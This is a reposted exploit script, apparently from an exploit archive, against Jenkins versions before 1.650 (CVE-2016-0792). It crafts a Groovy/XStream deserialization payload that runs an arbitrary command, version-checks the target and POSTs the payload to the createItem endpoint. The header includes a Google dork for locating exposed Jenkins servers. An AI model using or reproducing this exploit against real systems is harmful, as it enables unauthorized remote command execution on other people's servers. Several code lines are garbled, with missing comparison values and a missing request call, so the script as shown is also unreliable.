Jenkins < 1.650 - Java Deserialization
来源: 作者:Piechówka 发布时间:2017-08-01
import random import string from decimal import Decimal import requests from requests.exceptions import RequestException # Exploit Title: Jenkins CVE-2016-0792 Deserialization Remote Exploit # Google Dork: intitle: "Dashboard [Jenkins]" + "Manage Jenkins" # Date: 30-07-2017 # Exploit Author: Janusz Piechówka # Github: # Vendor Homepage: # Version: Versions before 1.650 and LTS before 1.642.2 # Tested on: Debian # CVE : CVE-2016-0792 def prepare_payload(command): splitCommand = command.split() preparedCommands = '' for entry in splitCommand: preparedCommands += f'<string>{entry}</string>' xml = f''' <map> <entry> <groovy.util.Expando> <expandoProperties> <entry> <string>hashCode</string> <org.codehaus.groovy.runtime.MethodClosure> <delegate class="groovy.util.Expando"/> <owner class="java.lang.ProcessBuilder"> <command>{preparedCommands}</command> </owner> <method>start</method> </org.codehaus.groovy.runtime.MethodClosure> </entry> </expandoProperties> </groovy.util.Expando> <int>1</int> </entry> </map>''' return xml def exploit(url, command): print(f'[*] STARTING') try: print(f'[+] Trying to exploit Jenkins running at address: {url}') # Perform initial URL check to see if server is online and returns correct response code using HEAD request headResponse = requests.head(url, timeout=30) if headResponse.status_code == print(f'[+] Server online and responding | RESPONSE: {headResponse.status_code}') # Check if X-Jenkins header containing version is present then proceed jenkinsVersionHeader = headResponse.headers.get('X-Jenkins') if jenkinsVersionHeader is not None: # Strip version after second dot from header to perform conversion to Decimal stripCharacter = "." strippedVersion = stripCharacter.join(jenkinsVersionHeader.split(stripCharacter)[:2]) # Perform basic version check if Decimal(strippedVersion) < 1.650: print(f'[+] Jenkins version: {Decimal(strippedVersion)} | VULNERABLE') # Prepare payload payload = prepare_payload(command) # Prepare POST url randomJobName = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(8)) if url.endswith('/'): postUrl = f'{url}createItem?name={randomJobName}' else: postUrl = f'{url}/createItem?name={randomJobName}' print(f'[+] Will POST to {postUrl}') # Try to execute passed command postResponse =, data=payload, headers={'Content-Type': 'application/xml'}) print(f'[+] Exploit launched ') # 500 response code is ok here print(f'[+] Response code: {postResponse.status_code} ') if postResponse.status_code == 500: print('[+] SUCCESS') else: print('[-][ERROR] EXPLOIT LAUNCHED, BUT WRONG RESPONSE CODE RETURNED') else: print(f'[-][ERROR] Version {Decimal(strippedVersion)} is not vulnerable') else: print(f'[-][ERROR] X-Jenkins header not present, check if Jenkins is actually running at {url}') else: print(f'[-][ERROR] {url} Server did not return success response code | RESPONSE: {headResponse.status_code}') except RequestException as ex: print(f'[-] [ERROR] Request exception: {ex}') print('[*] FINISHED')
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